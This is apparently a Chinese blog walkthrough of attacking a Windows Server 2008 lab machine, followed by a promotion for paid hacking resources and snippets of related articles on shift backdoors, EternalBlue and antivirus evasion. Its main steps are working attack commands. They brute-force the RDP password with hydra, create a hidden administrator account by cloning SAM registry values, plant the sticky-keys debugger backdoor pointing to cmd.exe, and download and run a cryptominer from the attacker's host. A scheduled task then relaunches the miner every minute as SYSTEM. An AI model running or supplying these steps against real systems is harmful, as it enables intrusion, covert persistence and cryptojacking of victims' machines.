渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)

article/2025/9/24 0:34:46

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆

一、环境搭建

靶机: Windwos Server 2008 系统
靶机IP地址: 192.168.226.137

攻击IP地址: 192.168.226.1

二、模拟攻击

2.1 扫描端口

拿到目标IP首先使用nmap扫描,探测一下开放的端口

nmap -sS 192.168.226.137

发现目标系统的 3389 号端口开发
在这里插入图片描述

2.2 暴力破解 Administrator 密码

使用 hydra 工具爆破 Administrator 登录密码

hydra.exe -l Administrator  -P pass.txt rdp://192.168.226.137

在这里插入图片描述
使用爆破出的密码成功登录目标系统

2.3 权限维持—Windows系统隐藏账户

添加wxiaoge$隐藏账户并且添加进管理员组,首先执行以下命令

net user wxiaoge$ w123456! /add                  #添加wxiaoge$隐藏用户
net localgroup administrators wxiaoge$ /add    #将wxiaoge$用户添加进管理员组中

在这里插入图片描述
然后打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”,将Administrator用户的权限,设置成“完全控制”,然后重新打开注册表,确保可以看到SAM路径下的文件。

找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限”
在这里插入图片描述
将Administrator用户的权限,设置成“完全控制”

在这里插入图片描述
重新打开注册表,确保可以看到SAM路径下的文件
在这里插入图片描述
之后,前往SAM/Domains/Account/Users/Names处,选择Administrator用户,在右侧的键值处可以找到对应的值如0x1f4,然后从左侧的Users目录下可以找到对应的文件。
在这里插入图片描述
然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户wxiaoge$所对应的文件,并将从Administrator文件中复制出来的F值粘贴进 wxiaoge $文件中。
在这里插入图片描述
在这里插入图片描述

最后将wxiaoge $ 和000003EB从注册表中右键导出,并删除wxiaoge$用户,然后将刚刚导出的两个文件重新导入进注册表中即可实现wxiaoge用户的隐藏。

导出:
在这里插入图片描述
在这里插入图片描述
删除 wxiaoge$ 账户,成功删除后,注册表中的000003EB、wxiaoge$都没有了
在这里插入图片描述
点击刚刚导出保存的 wxiaoge.reg和3EB.reg,点击之后会自动导入注册表
在这里插入图片描述
wxiaoge.reg和3EB.reg成功导入后,可以继续使用wxiag账户登录,之后验证后门账户,且成功登录

2.4 权限维持—shift粘贴键后门

1、粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。所以我们打开注册表,定位到以下路径:
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption
在这里插入图片描述

2、在目录中新建一个sethc.exe的子项,并添加一个新键debugger,debugger的对应键值为cms的路径。
cmd路径:C:\Windows\system32\cmd.exe
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.5 植入WaKuang程序

将WaKuang程序放在本机的WWW目录下
在这里插入图片描述
让靶机通过浏览器下载到本地,浏览器地址 http://192.168.226.1/wkbd.zip
在这里插入图片描述
之后在靶机(windows server 2008)上解压wkbd.zip文件并且执行 javs.exe WaKuang程序
在这里插入图片描述
执行之后查看 出现如下弹窗,说明WaKuang程序已经成功运行
在这里插入图片描述
为了防止管理员将WaKuang程序 javs.exe给关闭,设置计划任务,每隔一分钟执行一次 javs.exe WaKuang程序

schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\wkbd\javs.exe  /ru system /f
#创建一个system计划任务,每一分钟执行一次javs.exe

在这里插入图片描述
至此,模拟实战结束,成功留了后门、WaKuang样本程序,相关靶场在我的资源和星球中可以下载

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述


http://chatgpt.dhexx.cn/article/cm5ZPxl7.shtml

相关文章

搞死虚拟机-永恒之蓝和shift后门

扫描端口:发现开启了445端口可能存在永恒之蓝(ms17_010)漏洞 nmap -sV -p- -A -v 192.168.206.129 开启msf msfconsole 搜素 search ms17_010 使用msf验证脚本,验证是否存在ms17_010 use auxiliary/scanner/smb/smb_ms17_010…

shift后门的一个分析

有关shift后门的激活方式,目前发现的就这么几种1.使用键盘事件通过快捷键激活2.使用鼠标事件通过单击或双击界面某处激活3.使用键盘事件及鼠标事件相结合的方式激活  以上所说的是高防后门的激活方式,rar自解压的不在此范围之内,后门的编程语言目前发现以vb,delphi和c等语言为…

创建隐藏用户和shift后门制作

目录 创建隐藏用户 shift后门制作 创建隐藏用户 1、创建隐藏用户kiku$,并加入到管理员组 2、利用cmd命令行(命令net user)和计算机管理 查看结果 3、打开注册表 4、导出administrator和隐藏用户kiku$的文件 5、将隐藏用户删除(一定要使用…

后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成部分 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 大家都知道08权限的系统权限设置…

各式各样的shift后门

经常会看到一些服务器被入侵后,入侵者会留下一些各式各样的shift后门,五花八门的,各位网络管理员也看看自己的服务器的setch.exe是否被人替换了。 这个直接5次shift后进入分区 这个比较巧妙了,正常的最后那个按钮是灰色的&#xf…

网络安全实验十二 window 2003 Shift后门实验

一、实验目的 1、了解windows系统中的漏洞 2、了解windows系统漏洞的危害 3、了解windows系统如何预防漏洞带来的危害 4、了解利用windows 2003系统粘滞键漏洞建立后门程序并利用该后门 二、实验环境 实验主机:Windows Server 2003 实验目标服务器&#xff1a…

创建shift后门

一、实验目的及要求 1. 学会创建Shift后门 2.掌握shift后门的原理 二、实验设备(环境)及要求 PC机, VC等,虚拟云平台 三、实验内容与步骤 1.在192.168.1.3的虚拟机上打开cmd命令指示符; 2.输入“ cd c:\WINDOWS\system32”,进入该文件夹…

Windows留置后门——隐藏用户+Shift后门

文章目录 前言一、创建隐藏用户1. 创建用户2. 隐藏账号 二、Shift后门1. 后门制作2. 防御 总结 前言 后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境 一、创建隐藏用户 1. 创建用户 1.1、攻击者控制某台机器&#…

3389之永不查杀的后门shift后门代码

永不查杀的3389后门其原理就是利用shift后门,连敲5次shift键既可以直接进入服务器。 前些天在群里有个小伙伴问了一句谁知道shift后门的代码,当时我给了他一个链接,我总是觉得这个百度下就能找到吧,我查了一下,发现什么…

windows权限维持之shift后门

原理:沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行C:\Windows\System32下的sethc.exe,也就是启用了沾滞键,但是当我们将shell.exe文件把sethc.exe文件通过更改名称…

RDP shift后门漏洞

RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 在信息最下面有个隐私声明的…

mstsc之shift后门

我们在3389的时候,winserver03之后,验证端都放在了本地,mstsc无法进入锁屏界面,也就无法使用shifts后门 这里我们可以降低本地rdp客户端的版本,也可以在目标机器上做如下设置: 第一个是设置远程桌面连接的…

沾滞键shift后门

目录 1. 简介 2. 后门原理 3. 后门制作 3.1 方法一 cmd覆盖sethc 3.2 方法二 利用注册表修改沾滞键快捷方式 4. shift后门利用 1. 简介 沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下…

shift后门

参考:https://blog.csdn.net/qq_43626025/article/details/122031653 shift后门 替换C:\windows\system32\sethc.exe为你想要启动的后门程序,这里替换为我们用最常见的cmd.exe。 这里要注意下,默认情况下我们需要先改变sethc的所有者&#x…

④开启shift后门实验报告

班级 计科1班 姓名 彭彭头 学号 时间 2022.05.13 成绩 实验项目名称 开启shift后门 实验目的 1、了解常用入侵主机的方法 2、掌握操作系统常见漏洞,并学会防范 实验内容 利用Windows7系统的shift漏洞,开启后门。 实验环境 操作系统&a…

Windows留后门--教程(五)——shift粘贴键后门

一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来…

后门之shift后门制作及修复方法

一、如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe h attr…

警惕免杀版Gh0st木马!

https://github.com/SecurityNo1/Gh0st2023 经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免…

PHP之一句话木马免杀

目录 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 <?php $a ass; $b er; $c t…

MSF(2)——各种木马的生成及简单的免杀

本专栏是笔者的网络安全学习笔记&#xff0c;一面分享&#xff0c;同时作为笔记 文章目录 前文链接木马生成免杀php 免杀Python 免杀分析木马文件编写免杀马打包exe 前文链接 WAMP/DVWA/sqli-labs 搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描&#xff0c;请求重发…